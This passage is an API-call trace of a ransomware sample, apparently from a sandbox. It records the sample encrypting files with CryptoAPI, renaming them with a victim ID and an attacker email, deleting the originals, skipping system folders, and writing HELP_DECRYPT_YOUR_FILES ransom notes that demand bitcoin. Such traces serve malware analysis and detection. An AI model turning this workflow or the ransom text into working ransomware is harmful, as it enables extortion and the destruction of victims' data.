msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.305] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.305] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.306] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.308] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0xcb, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0xcb, lpOverlapped=0x0) returned 1
	[0173.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.312] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb330) returned 1
	[0173.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.314] CryptCreateHash (in: hProv=0xfcb330, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0173.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.314] CryptHashData (hHash=0xfb8eb0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.315] CryptDeriveKey (in: hProv=0xfcb330, Algid=0x6610, hBaseData=0xfb8eb0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8ff0) returned 1
	[0173.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.315] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0xcb, dwBufLen=0xcb | out: pbData=0x0*, pdwDataLen=0x1894fc*=0xd0) returned 1
	[0173.315] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.315] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0xcb | out: Destination=0xfdc6a8) 
	[0173.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.316] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x1894dc*=0xcb, dwBufLen=0xd0 | out: pbData=0xfdc6a8*, pdwDataLen=0x1894dc*=0xd0) returned 1
	[0173.316] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.316] CryptDestroyKey (hKey=0xfb8ff0) returned 1
	[0173.317] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.317] CryptDestroyHash (hHash=0xfb8eb0) returned 1
	[0173.317] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.317] CryptReleaseContext (hProv=0xfcb330, dwFlags=0x0) returned 1
	[0173.317] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.317] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.318] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.318] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0173.319] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0173.319] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0173.320] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x189938*=0xd0, lpOverlapped=0x0) returned 1
	[0173.323] CloseHandle (hObject=0x3a0) returned 1
	[0173.324] CloseHandle (hObject=0x39c) returned 1
	[0173.325] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml")) returned 1
	[0173.333] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml")) returned 0
	[0173.334] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1646620, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1646620, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0173.334] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.334] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.335] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov"
	[0173.335] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*"
	[0173.335] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.335] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.335] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0173.336] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.336] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.336] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.340] CloseHandle (hObject=0x390) returned 1
	[0173.340] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.342] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0173.344] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.344] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.344] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.344] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.344] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0173.345] CloseHandle (hObject=0x390) returned 1
	[0173.346] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.346] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.346] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.346] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0173.346] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.353] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.353] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0173.357] CloseHandle (hObject=0x390) returned 1
	[0173.358] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.358] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.359] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0173.360] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.360] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.360] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.361] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.361] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0173.361] CloseHandle (hObject=0x390) returned 1
	[0173.362] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80d82bca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80da8d75, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.362] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*") returned 89
	[0173.362] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.362] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*") returned 0x59
	[0173.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.368] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="programdata") returned 0x0
